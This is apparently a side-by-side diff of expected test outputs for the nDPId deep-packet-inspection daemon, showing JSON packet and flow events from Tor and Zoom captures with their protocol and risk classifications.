00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3833,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822264155,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3833,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822264155,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3833,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822264211} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3833,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822264211}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3853,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822265221,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3853,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822265221,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3853,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822266211} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3853,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822266211}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3854,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822265221,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3854,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822265221,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3854,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822268211} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3854,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822268211}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3855,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822265221,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3855,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822265221,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3855,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822270212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3855,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822270212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3856,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822265221,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3856,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822265221,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3856,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822272211} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3856,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822272211}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822274212} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3858,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822274212}
00360{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822274144,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00194{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822276211} 00180{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822276211}
01050{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}} 01050{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1383822129897,"flow_last_seen":1383822265221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10408,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1383821673254,"flow_last_seen":1383822274144,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1383821673254,"flow_last_seen":1383822274144,"flow_idle_time":180000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3859,"source":"tor.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1383822217531,"flow_last_seen":1383822248944,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":534,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1383822274144,"l3_proto":"ip6","src_ip":"fe80::c583:1972:5728:7323","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}}
@@ -366,6 +366,6 @@
~~ total memory freed........: 4811059 bytes ~~ total memory freed........: 4811059 bytes
~~ total allocations/frees...: 104890/104890 ~~ total allocations/frees...: 104890/104890
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 196 chars ~~ json string min len.......: 182 chars
~~ json string max len.......: 1412 chars ~~ json string max len.......: 1412 chars
~~ json string avg len.......: 804 chars ~~ json string avg len.......: 797 chars

16
test/results/zoom.pcap.out
View File

@@ -12,8 +12,8 @@
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"}
01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 01133{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520466531,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520466531,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520467785} 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520467785}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"thread_ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520467811,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEABEHgAAAQEICiWc1TCZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520467811,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEABEHgAAAQEICiWc1TCZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="}
00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="} 00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="}
@@ -75,8 +75,8 @@
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569520469423,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4WycAAEABlHPAqAF1ov8mDgMDkd4AAAAARQAAPMGVQAAuEf\/wov8mDsCoAXUNl11fACgAAA=="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569520469423,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4WycAAEABlHPAqAF1ov8mDgMDkd4AAAAARQAAPMGVQAAuEf\/wov8mDsCoAXUNl11fACgAAA=="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005} 00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005}
